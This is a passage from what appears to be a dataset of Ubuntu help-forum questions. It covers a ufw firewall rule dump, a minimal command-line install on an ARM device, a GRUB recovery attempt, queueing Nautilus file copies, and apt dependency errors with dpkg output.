0.0.0.0/0 state related , established 0 0 ufw-logging-deny all -- * * 0.0.0.0/0 0.0.0.0/0 state invalid 0 0 drop all -- * * 0.0.0.0/0 0.0.0.0/0 state invalid 0 0 accept icmp -- * * 0.0.0.0/0 0.0.0.0/0 icmptype 3 0 0 accept icmp -- * * 0.0.0.0/0 0.0.0.0/0 icmptype 4 0 0 accept icmp -- * * 0.0.0.0/0 0.0.0.0/0 icmptype 11 0 0 accept icmp -- * * 0.0.0.0/0 0.0.0.0/0 icmptype 12 0 0 accept icmp -- * * 0.0.0.0/0 0.0.0.0/0 icmptype 8 0 0 accept udp -- * * 0.0.0.0/0 0.0.0.0/0 udp spt:67 dpt:68 0 0 ufw-not-local all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 accept udp -- * * 0.0.0.0/0 224.0.0.251 udp dpt:5353 0 0 accept udp -- * * 0.0.0.0/0 239.255.255.250 udp dpt:1900 0 0 ufw-user-input all -- * * 0.0.0.0/0 0.0.0.0/0 chain ufw-before-logging-forward ( 1 references ) pkts bytes target prot opt in out source destination 0 0 log all -- * * 0.0.0.0/0 0.0.0.0/0 limit : avg 3/min burst 10 log flags 0 level 4 prefix `` [ ufw audit ] `` chain ufw-before-logging-input ( 1 references ) pkts bytes target prot opt in out source destination 0 0 log all -- * * 0.0.0.0/0 0.0.0.0/0 limit : avg 3/min burst 10 log flags 0 level 4 prefix `` [ ufw audit ] `` chain ufw-before-logging-output ( 1 references ) pkts bytes target prot opt in out source destination 0 0 log all -- * * 0.0.0.0/0 0.0.0.0/0 limit : avg 3/min burst 10 log flags 0 level 4 prefix `` [ ufw audit ] `` chain ufw-before-output ( 1 references ) pkts bytes target prot opt in out source destination 0 0 accept all -- * lo 0.0.0.0/0 0.0.0.0/0 0 0 accept all -- * * 0.0.0.0/0 0.0.0.0/0 state related , established 0 0 ufw-user-output all -- * * 0.0.0.0/0 0.0.0.0/0 chain ufw-logging-allow ( 0 references ) pkts bytes target prot opt in out source destination 0 0 log all -- * * 0.0.0.0/0 0.0.0.0/0 log flags 0 level 4 prefix `` [ ufw allow ] `` chain ufw-logging-deny ( 2 references ) pkts bytes target prot opt in out source destination 0 0 log all -- * * 0.0.0.0/0 0.0.0.0/0 state invalid log flags 0 level 4 prefix `` [ ufw audit invalid ] `` 0 0 log all -- * * 0.0.0.0/0 0.0.0.0/0 log flags 0 level 4 prefix `` [ ufw block ] `` chain ufw-not-local ( 1 references ) pkts bytes target prot opt in out source destination 0 0 return all -- * * 0.0.0.0/0 0.0.0.0/0 addrtype match dst-type local 0 0 return all -- * * 0.0.0.0/0 0.0.0.0/0 addrtype match dst-type multicast 0 0 return all -- * * 0.0.0.0/0 0.0.0.0/0 addrtype match dst-type broadcast 0 0 ufw-logging-deny all -- * * 0.0.0.0/0 0.0.0.0/0 limit : avg 3/min burst 10 0 0 drop all -- * * 0.0.0.0/0 0.0.0.0/0 chain ufw-reject-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-reject-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-reject-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-skip-to-policy-forward ( 0 references ) pkts bytes target prot opt in out source destination 0 0 drop all -- * * 0.0.0.0/0 0.0.0.0/0 chain ufw-skip-to-policy-input ( 7 references ) pkts bytes target prot opt in out source destination 0 0 drop all -- * * 0.0.0.0/0 0.0.0.0/0 chain ufw-skip-to-policy-output ( 0 references ) pkts bytes target prot opt in out source destination 0 0 drop all -- * * 0.0.0.0/0 0.0.0.0/0 chain ufw-track-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-track-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-user-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-user-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw-user-limit ( 0 references ) pkts bytes target prot opt in out source destination 0 0 log all -- * * 0.0.0.0/0 0.0.0.0/0 limit : avg 3/min burst 5 log flags 0 level 4 prefix `` [ ufw limit block ] `` 0 0 reject all -- * * 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable chain ufw-user-limit-accept ( 0 references ) pkts bytes target prot opt in out source destination 0 0 accept all -- * * 0.0.0.0/0 0.0.0.0/0 chain ufw-user-logging-forward ( 0 references ) pkts bytes target prot opt in out source destination chain ufw-user-logging-input ( 0 references ) pkts bytes target prot opt in out source destination chain ufw-user-logging-output ( 0 references ) pkts bytes target prot opt in out source destination chain ufw-user-output ( 1 references ) pkts bytes target prot opt in out source destination chain prerouting ( policy accept 539090 packets , 100712724 bytes ) pkts bytes target prot opt in out source destination chain input ( policy accept 306 packets , 28746 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 372448 packets , 21597937 bytes ) pkts bytes target prot opt in out source destination chain postrouting ( policy accept 369100 packets , 21156985 bytes ) pkts bytes target prot opt in out source destination chain prerouting ( policy accept 4477889 packets , 3314295778 bytes ) pkts bytes target prot opt in out source destination chain input ( policy accept 4233318 packets , 3244180512 bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 3535682 packets , 419300008 bytes ) pkts bytes target prot opt in out source destination chain postrouting ( policy accept 3553346 packets , 421249234 bytes ) pkts bytes target prot opt in out source destination chain prerouting ( policy accept 181 packets , 36795 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 167 packets , 31957 bytes ) pkts bytes target prot opt in out source destination ipv6 : chain input ( policy drop 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 145 10432 ufw6-before-logging-input all * * : :/0 : :/0 145 10432 ufw6-before-input all * * : :/0 : :/0 0 0 ufw6-after-input all * * : :/0 : :/0 0 0 ufw6-after-logging-input all * * : :/0 : :/0 0 0 ufw6-reject-input all * * : :/0 : :/0 0 0 ufw6-track-input all * * : :/0 : :/0 chain forward ( policy drop 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 0 0 ufw6-before-logging-forward all * * : :/0 : :/0 0 0 ufw6-before-forward all * * : :/0 : :/0 0 0 ufw6-after-forward all * * : :/0 : :/0 0 0 ufw6-after-logging-forward all * * : :/0 : :/0 0 0 ufw6-reject-forward all * * : :/0 : :/0 chain output ( policy drop 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination 22 1432 ufw6-before-logging-output all * * : :/0 : :/0 22 1432 ufw6-before-output all * * : :/0 : :/0 15 960 ufw6-after-output all * * : :/0 : :/0 15 960 ufw6-after-logging-output all * * : :/0 : :/0 15 960 ufw6-reject-output all * * : :/0 : :/0 15 960 ufw6-track-output all * * : :/0 : :/0 chain ufw6-after-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw6-after-input ( 1 references ) pkts bytes target prot opt in out source destination 0 0 ufw6-skip-to-policy-input udp * * : :/0 : :/0 udp dpt:137 0 0 ufw6-skip-to-policy-input udp * * : :/0 : :/0 udp dpt:138 0 0 ufw6-skip-to-policy-input tcp * * : :/0 : :/0 tcp dpt:139 0 0 ufw6-skip-to-policy-input tcp * * : :/0 : :/0 tcp dpt:445 0 0 ufw6-skip-to-policy-input udp * * : :/0 : :/0 udp dpt:67 0 0 ufw6-skip-to-policy-input udp * * : :/0 : :/0 udp dpt:68 chain ufw6-after-logging-forward ( 1 references ) pkts bytes target prot opt in out source destination 0 0 log all * * : :/0 : :/0 log flags 0 level 4 prefix `` [ ufw block ] `` chain ufw6-after-logging-input ( 1 references ) pkts bytes target prot opt in out source destination 0 0 log all * * : :/0 : :/0 log flags 0 level 4 prefix `` [ ufw block ] `` chain ufw6-after-logging-output ( 1 references ) pkts bytes target prot opt in out source destination 0 0 log all * * : :/0 : :/0 log flags 0 level 4 prefix `` [ ufw block ] `` chain ufw6-after-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw6-before-forward ( 1 references ) pkts bytes target prot opt in out source destination 0 0 drop all * * : :/0 : :/0 rt type:0 segsleft:0 0 0 ufw6-user-forward all * * : :/0 : :/0 chain ufw6-before-input ( 1 references ) pkts bytes target prot opt in out source destination 0 0 accept all lo * : :/0 : :/0 0 0 drop all * * : :/0 : :/0 rt type:0 segsleft:0 0 0 accept icmpv6 * * : :/0 : :/0 ipv6-icmptype 135 hl match hl == 255 0 0 accept icmpv6 * * : :/0 : :/0 ipv6-icmptype 136 hl match hl == 255 0 0 accept icmpv6 * * : :/0 : :/0 ipv6-icmptype 133 hl match hl == 255 0 0 accept icmpv6 * * : :/0 : :/0 ipv6-icmptype 134 hl match hl == 255 0 0 accept all * * : :/0 : :/0 state related , established 0 0 accept icmpv6 * * fe80 : :/10 : :/0 ipv6-icmptype 129 0 0 ufw6-logging-deny all * * : :/0 : :/0 state invalid 0 0 drop all * * : :/0 : :/0 state invalid 0 0 accept icmpv6 * * : :/0 : :/0 ipv6-icmptype 1 0 0 accept icmpv6 * * : :/0 : :/0 ipv6-icmptype 2 0 0 accept icmpv6 * * : :/0 : :/0 ipv6-icmptype 3 0 0 accept icmpv6 * * : :/0 : :/0 ipv6-icmptype 4 0 0 accept icmpv6 * * : :/0 : :/0 ipv6-icmptype 128 0 0 accept udp * * fe80 : :/10 fe80 : :/10 udp spt:547 dpt:546 0 0 accept udp * * : :/0 ff02 : :fb/128 udp dpt:5353 0 0 accept udp * * : :/0 ff02 : :f/128 udp dpt:1900 0 0 ufw6-user-input all * * : :/0 : :/0 chain ufw6-before-logging-forward ( 1 references ) pkts bytes target prot opt in out source destination 0 0 log all * * : :/0 : :/0 limit : avg 3/min burst 10 log flags 0 level 4 prefix `` [ ufw audit ] `` chain ufw6-before-logging-input ( 1 references ) pkts bytes target prot opt in out source destination 0 0 log all * * : :/0 : :/0 limit : avg 3/min burst 10 log flags 0 level 4 prefix `` [ ufw audit ] `` chain ufw6-before-logging-output ( 1 references ) pkts bytes target prot opt in out source destination 0 0 log all * * : :/0 : :/0 limit : avg 3/min burst 10 log flags 0 level 4 prefix `` [ ufw audit ] `` chain ufw6-before-output ( 1 references ) pkts bytes target prot opt in out source destination 0 0 accept all * lo : :/0 : :/0 0 0 drop all * * : :/0 : :/0 rt type:0 segsleft:0 0 0 accept icmpv6 * * : :/0 : :/0 ipv6-icmptype 135 hl match hl == 255 0 0 accept icmpv6 * * : :/0 : :/0 ipv6-icmptype 136 hl match hl == 255 0 0 accept all * * : :/0 : :/0 state related , established 0 0 ufw6-user-output all * * : :/0 : :/0 chain ufw6-logging-allow ( 0 references ) pkts bytes target prot opt in out source destination 0 0 log all * * : :/0 : :/0 log flags 0 level 4 prefix `` [ ufw allow ] `` chain ufw6-logging-deny ( 1 references ) pkts bytes target prot opt in out source destination 0 0 log all * * : :/0 : :/0 state invalid log flags 0 level 4 prefix `` [ ufw audit invalid ] `` 0 0 log all * * : :/0 : :/0 log flags 0 level 4 prefix `` [ ufw block ] `` chain ufw6-reject-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw6-reject-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw6-reject-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw6-skip-to-policy-forward ( 0 references ) pkts bytes target prot opt in out source destination 0 0 drop all * * : :/0 : :/0 chain ufw6-skip-to-policy-input ( 6 references ) pkts bytes target prot opt in out source destination 0 0 drop all * * : :/0 : :/0 chain ufw6-skip-to-policy-output ( 0 references ) pkts bytes target prot opt in out source destination 0 0 drop all * * : :/0 : :/0 chain ufw6-track-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw6-track-output ( 1 references ) pkts bytes target prot opt in out source destination chain ufw6-user-forward ( 1 references ) pkts bytes target prot opt in out source destination chain ufw6-user-input ( 1 references ) pkts bytes target prot opt in out source destination chain ufw6-user-limit ( 0 references ) pkts bytes target prot opt in out source destination chain ufw6-user-limit-accept ( 0 references ) pkts bytes target prot opt in out source destination chain ufw6-user-logging-forward ( 0 references ) pkts bytes target prot opt in out source destination chain ufw6-user-logging-input ( 0 references ) pkts bytes target prot opt in out source destination chain ufw6-user-output ( 1 references ) pkts bytes target prot opt in out source destination chain prerouting ( policy accept 17 packets , 1813 bytes ) pkts bytes target prot opt in out source destination chain input ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain postrouting ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination how do i set up ufw so that with deny/deny it ensures that no packets are sent accross my ethernet device ? isnt ufw on deny/deny supposed to block everything from going thru the eth0 network card in both directions ? edit : my temporary hack to fix it by fake-disconnecting the network cable is running : sudo service networking stop
428585	command line install only	i want to install ubuntu on a small arm-based device ( trimslice ) to control a bitcoin mining device , but i have no need for a gui . i do n't want xorg , i do n't want unity , no nouveau , none of that . i want the ability to install .deb packages using apt-get and i want ubuntu because i 'm familiar with it . i already had ubuntu 12.04 on this device previously , but upgrading ubuntu caused the machine to fail to boot . i want to start over with whichever version makes sense , but mostly i just want only a command line .
428586	my grub is gone after update to ubuntu 13 . i get a grub prompt on boot how do i get back ?	i have found different posts here that deal with similar issues , but i am unable to get any of these to work . here is what happened to me : i had an ubuntu-12 installation , on which i ran update and upgrade ( clicked on the update button on the task bar ) . after this , the machine rebooted , and i noticed that the task bar still had the intimation for update . after clicking this a second time , the machine asked to reboot , and after rebooting i am at the bare grub prompt . here is what i have tried so far . i tried to see if i could boot from the menu ( according to another post here . ) but my grub menu was wiped . cat /boot/grub/grub.cfg -- this is empty next , i tried to find the vmlinuz partition using 'find ' but apparently , 'find ' does not exist any more . i see a command 'help ' which scrolls fast , and i do n't see any way to look at any thing more than the last screen full . ( no more/less commands ) any way , i found another post mentioning 'ls ' , using which i found that my partition ( hd0 , msdos5 ) contains my ubuntu installation . prefix= ( hd0 , msdos5 ) /boot/grub set root= ( hd0 , msdos5 ) insmod ( hd0 , msdos5 ) /boot/grub/linux.mod linux /vmlinuz root=/dev/sda5 ro initrd /initrd.img boot and various combinations there of , by removing ro , removing prefix etc . i get the following screen vfs : can not open root device `` sda5 '' or unknown-block ( 0,0 ) please append a correct root= boot option ; here are the available partitions ( empty ) kernel panic - vfs unable to mount root fs on unnown-block ( 0,0 ) now , what do i try next ? any help is appreciated .
428587	enqueue nautilus file operations	copying ( or moving ) files in parallel can degrade so much the performance . i usually need to copy large amount of files over network using the nautilus ( using stuff like smb : // or sftp : // urls ) . the answer for similar questions before only handle in disk operations only , not for stuff mounted in nautilus . i tried to use ultracopier ( from this answer how can i queue file operations ? ) and using the ~/.gvfs/ folder but it generates error ( operation not supported ) . so how can i enqueue nautilus operations with all the options i have using the nautilus ( like networking and all gvfs mounts ) ?
428591	broken packages on my system	edit : i gave up on repairing the issue . the reason why is in the comments . i ca n't manage to figure out what is preventing me from installing htop . i 've tried the tutorial posted here . when i try to install it with sudo apt-get install htop , it returns this : lubuntu @ lubuntu : ~ $ sudo apt-get install htop reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : aptdaemon : depends : python3-aptdaemon ( = 1.1.1-0ubuntu3 ) but 1.1.1-0ubuntu4 is to be installed recommends : lintian but it is not going to be installed bind9-host : depends : libbind9-90 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is to be installed depends : libdns99 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is to be installed depends : libisc95 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is to be installed depends : libisccfg90 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is to be installed depends : liblwres90 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is to be installed cpp-4.8 : depends : gcc-4.8-base ( = 4.8.1-10ubuntu8 ) but 4.8.1-10ubuntu9 is to be installed cups : depends : libcups2 ( = 1.7.0~rc1-0ubuntu5 ) but 1.7.0~rc1-0ubuntu5.2 is to be installed recommends : colord but it is not going to be installed cups-client : depends : libcups2 ( = 1.7.0~rc1-0ubuntu5 ) but 1.7.0~rc1-0ubuntu5.2 is to be installed recommends : smbclient but it is not going to be installed cups-daemon : depends : libcups2 ( = 1.7.0~rc1-0ubuntu5 ) but 1.7.0~rc1-0ubuntu5.2 is to be installed recommends : colord but it is not going to be installed recommends : cups-browsed but it is not going to be installed dnsutils : depends : libbind9-90 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is to be installed depends : libdns99 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is to be installed depends : libisc95 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is to be installed depends : libisccfg90 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is to be installed depends : liblwres90 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is to be installed libglib2.0-bin : depends : libglib2.0-0 ( = 2.38.0-1ubuntu1 ) but 2.38.1-0ubuntu1 is to be installed libunity9 : depends : libunity-protocol-private0 ( = 7.1.2+13.10.20131010-0ubuntu1 ) but 7.1.2+13.10.20131010-0ubuntu2 is to be installed ubuntu-release-upgrader-core : depends : python3-distupgrade ( = 1:0.205 ) but 1:0.205.4 is to be installed ubuntu-release-upgrader-gtk : depends : ubuntu-release-upgrader-core ( = 1:0.205.4 ) but 1:0.205 is to be installed udev : depends : libudev1 ( = 204-0ubuntu18 ) but 204-0ubuntu19.1 is to be installed update-manager-core : depends : python3-update-manager ( = 1:0.194 ) but 1:0.194.1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . apt-get check replies with : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : aptdaemon : depends : python3-aptdaemon ( = 1.1.1-0ubuntu3 ) but 1.1.1-0ubuntu4 is installed recommends : lintian but it is not installed bind9-host : depends : libbind9-90 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is installed depends : libdns99 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is installed depends : libisc95 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is installed depends : libisccfg90 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is installed depends : liblwres90 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is installed cpp-4.8 : depends : gcc-4.8-base ( = 4.8.1-10ubuntu8 ) but 4.8.1-10ubuntu9 is installed cups : depends : libcups2 ( = 1.7.0~rc1-0ubuntu5 ) but 1.7.0~rc1-0ubuntu5.2 is installed recommends : colord but it is not installed cups-client : depends : libcups2 ( = 1.7.0~rc1-0ubuntu5 ) but 1.7.0~rc1-0ubuntu5.2 is installed recommends : smbclient but it is not installed cups-daemon : depends : libcups2 ( = 1.7.0~rc1-0ubuntu5 ) but 1.7.0~rc1-0ubuntu5.2 is installed recommends : colord but it is not installed recommends : cups-browsed but it is not installed dnsutils : depends : libbind9-90 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is installed depends : libdns99 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is installed depends : libisc95 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is installed depends : libisccfg90 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is installed depends : liblwres90 ( = 1:9.9.3.dfsg.p2-4ubuntu1 ) but 1:9.9.3.dfsg.p2-4ubuntu1.1 is installed libglib2.0-bin : depends : libglib2.0-0 ( = 2.38.0-1ubuntu1 ) but 2.38.1-0ubuntu1 is installed libunity9 : depends : libunity-protocol-private0 ( = 7.1.2+13.10.20131010-0ubuntu1 ) but 7.1.2+13.10.20131010-0ubuntu2 is installed ubuntu-release-upgrader-core : depends : python3-distupgrade ( = 1:0.205 ) but 1:0.205.4 is installed ubuntu-release-upgrader-gtk : depends : ubuntu-release-upgrader-core ( = 1:0.205.4 ) but 1:0.205 is installed udev : depends : libudev1 ( = 204-0ubuntu18 ) but 204-0ubuntu19.1 is installed update-manager-core : depends : python3-update-manager ( = 1:0.194 ) but 1:0.194.1 is installed e : unmet dependencies . try using -f. cat /etc/apt/sources.list { , .d/*.list } replies with : lubuntu @ lubuntu : ~ $ cat /etc/apt/sources.list { , .d/*.list } deb cdrom : [ lubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) ] / saucy main multiverse restricted universe deb http : //archive.ubuntu.com/ubuntu/ saucy main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu/ saucy-security main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ saucy-updates main restricted universe multiverse # deb http : //ppa.launchpad.net/linrunner/tlp/ubuntu saucy main # deb-src http : //ppa.launchpad.net/linrunner/tlp/ubuntu saucy main lubuntu @ lubuntu : ~ $ cat /etc/apt/sources.list { , .d/*.list } deb cdrom : [ lubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) ] / saucy main multiverse restricted universe deb http : //archive.ubuntu.com/ubuntu/ saucy main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu/ saucy-security main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu/ saucy-updates main restricted universe multiverse sudo apt-get install -f results : pastebin : lubuntu @ lubuntu : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : aptdaemon bind9-host cpp-4.8 cups cups-client cups-daemon dnsutils libglib2.0-bin libunity9 ubuntu-release-upgrader-core udev update-manager update-manager-core suggested packages : gcc-4.8-locales cups-bsd printer-driver-hpcups hplip cups-pdf smbclient xpp rblcheck unity-common recommended packages : lintian colord cups-browsed the following packages will be upgraded : aptdaemon bind9-host cpp-4.8 cups cups-client cups-daemon dnsutils libglib2.0-bin libunity9 ubuntu-release-upgrader-core udev update-manager update-manager-core 13 upgraded , 0 newly installed , 0 to remove and 91 not upgraded . 2 not fully installed or removed . need to get 0 b/8,908 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y preconfiguring packages ... ( reading database ... 131819 files and directories currently installed . ) preparing to replace ubuntu-release-upgrader-core 1:0.205 ( using ... /ubuntu-release-upgrader-core_1 % 3a0.205.4_all.deb ) ... unpacking replacement ubuntu-release-upgrader-core ... dpkg : error processing /var/cache/apt/archives/ubuntu-release-upgrader-core_1 % 3a0.205.4_all.deb ( -- unpack ) : unable to create `/usr/bin/do-release-upgrade.dpkg-new ' ( while processing `./usr/bin/do-release-upgrade ' ) : input/output error no apport report written because maxreports is reached already preparing to replace update-manager 1:0.194 ( using ... /update-manager_1 % 3a0.194.1_all.deb ) ... unpacking replacement update-manager ... dpkg : error processing /var/cache/apt/archives/update-manager_1 % 3a0.194.1_all.deb ( -- unpack ) : unable to create `/usr/share/man/man8/update-manager.8.gz.dpkg-new ' ( while processing `./usr/share/man/man8/update-manager.8.gz ' ) : input/output error no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) preparing to replace update-manager-core 1:0.194 ( using ... /update-manager-core_1 % 3a0.194.1_all.deb ) ... unpacking replacement update-manager-core ... dpkg : error processing /var/cache/apt/archives/update-manager-core_1 % 3a0.194.1_all.deb ( -- unpack ) : unable to create `/usr/share/apport/package-hooks/source_update-manager.py.dpkg-new ' ( while processing `./usr/share/apport/package-hooks/source_update-manager.py ' ) : input/output error no apport report written because maxreports is reached already preparing to replace cups-daemon 1.7.0~rc1-0ubuntu5 ( using ... /cups-daemon_1.7.0~rc1-0ubuntu5.2_amd64.deb ) ... cups stop/waiting unpacking replacement cups-daemon ... dpkg : error processing /var/cache/apt/archives/cups-daemon_1.7.0~rc1-0ubuntu5.2_amd64.deb ( -- unpack ) : unable to create `/usr/share/man/man5/classes.conf.5.gz.dpkg-new ' ( while processing `./usr/share/man/man5/classes.conf.5.gz ' ) : input/output error no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) cups start/running , process 7634 preparing to replace libunity9 : amd64 7.1.2+13.10.20131010-0ubuntu1 ( using ... /libunity9_7.1.2+13.10.20131010-0ubuntu2_amd64.deb ) ... unpacking replacement libunity9 : amd64 ... dpkg : error processing /var/cache/apt/archives/libunity9_7.1.2+13.10.20131010-0ubuntu2_amd64.deb ( -- unpack ) : unable to create `/usr/bin/unity-scope-loader.dpkg-new ' ( while processing `./usr/bin/unity-scope-loader ' ) : input/output error no apport report written because maxreports is reached already preparing to replace udev 204-0ubuntu18 ( using ... /udev_204-0ubuntu19.1_amd64.deb ) ... adding 'diversion of /bin/udevadm to /bin/udevadm.upgrade by fake-udev' unpacking replacement udev ... dpkg : error processing /var/cache/apt/archives/udev_204-0ubuntu19.1_amd64.deb ( -- unpack ) : unable to create `/usr/share/apport/package-hooks/udev.py.dpkg-new ' ( while processing `./usr/share/apport/package-hooks/udev.py ' ) : input/output error no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) removing 'diversion of /bin/udevadm to /bin/udevadm.upgrade by fake-udev' preparing to replace bind9-host 1:9.9.3.dfsg.p2-4ubuntu1 ( using ... /bind9-host_1 % 3a9.9.3.dfsg.p2-4ubuntu1.1_amd64.deb ) ... unpacking replacement bind9-host ... dpkg : error processing /var/cache/apt/archives/bind9-host_1 % 3a9.9.3.dfsg.p2-4ubuntu1.1_amd64.deb ( -- unpack ) : unable to create `/usr/share/man/man1/host.1.gz.dpkg-new ' ( while processing `./usr/share/man/man1/host.1.gz ' ) : input/output error no apport report written because maxreports is reached already preparing to replace dnsutils 1:9.9.3.dfsg.p2-4ubuntu1 ( using ... /dnsutils_1 % 3a9.9.3.dfsg.p2-4ubuntu1.1_amd64.deb ) ... unpacking replacement dnsutils ... dpkg : error processing /var/cache/apt/archives/dnsutils_1 % 3a9.9.3.dfsg.p2-4ubuntu1.1_amd64.deb ( -- unpack ) : unable to create `/usr/share/man/man1/dig.1.gz.dpkg-new ' ( while processing `./usr/share/man/man1/dig.1.gz ' ) : input/output error no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) preparing to replace cpp-4.8 4.8.1-10ubuntu8 ( using ... /cpp-4.8_4.8.1-10ubuntu9_amd64.deb ) ... unpacking replacement cpp-4.8 ... dpkg : error processing /var/cache/apt/archives/cpp-4.8_4.8.1-10ubuntu9_amd64.deb ( -- unpack ) : unable to create `/usr/bin/cpp-4.8.dpkg-new ' ( while processing `./usr/bin/cpp-4.8 ' ) : input/output error no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) preparing to replace cups-client 1.7.0~rc1-0ubuntu5 ( using ... /cups-client_1.7.0~rc1-0ubuntu5.2_amd64.deb ) ... unpacking replacement cups-client ... dpkg : error processing /var/cache/apt/archives/cups-client_1.7.0~rc1-0ubuntu5.2_amd64.deb ( -- unpack ) : unable to create `/usr/share/man/man1/cancel.1.gz.dpkg-new ' ( while processing `./usr/share/man/man1/cancel.1.gz ' ) : input/output error no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) preparing to replace cups 1.7.0~rc1-0ubuntu5 ( using ... /cups_1.7.0~rc1-0ubuntu5.2_amd64.deb ) ... unpacking replacement cups ... dpkg : error processing /var/cache/apt/archives/cups_1.7.0~rc1-0ubuntu5.2_amd64.deb ( -- unpack ) : unable to create `/usr/share/man/man5/mime.convs.5.gz.dpkg-new ' ( while processing `./usr/share/man/man5/mime.convs.5.gz ' ) : input/output error no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) preparing to replace libglib2.0-bin 2.38.0-1ubuntu1 ( using ... /libglib2.0-bin_2.38.1-0ubuntu1_amd64.deb ) ... unpacking replacement libglib2.0-bin ... dpkg : error processing /var/cache/apt/archives/libglib2.0-bin_2.38.1-0ubuntu1_amd64.deb ( -- unpack ) : unable to create `/usr/share/man/man1/gsettings.1.gz.dpkg-new ' ( while processing `./usr/share/man/man1/gsettings.1.gz ' ) : input/output error no apport report written because maxreports is reached already preparing to replace aptdaemon 1.1.1-0ubuntu3 ( using ... /aptdaemon_1.1.1-0ubuntu4_all.deb ) ... unpacking replacement aptdaemon ... dpkg : error processing /var/cache/apt/archives/aptdaemon_1.1.1-0ubuntu4_all.deb ( -- unpack ) : unable to create `/usr/bin/aptdcon.dpkg-new ' ( while processing `./usr/bin/aptdcon ' ) : input/output error no apport report written because maxreports is reached already processing triggers for gconf2 ... processing triggers for libglib2.0-0 : amd64 ... processing triggers for man-db ... processing triggers for ureadahead ... errors were encountered while processing : /var/cache/apt/archives/ubuntu-release-upgrader-core_1 % 3a0.205.4_all.deb /var/cache/apt/archives/update-manager_1 % 3a0.194.1_all.deb /var/cache/apt/archives/update-manager-core_1 % 3a0.194.1_all.deb /var/cache/apt/archives/cups-daemon_1.7.0~rc1-0ubuntu5.2_amd64.deb 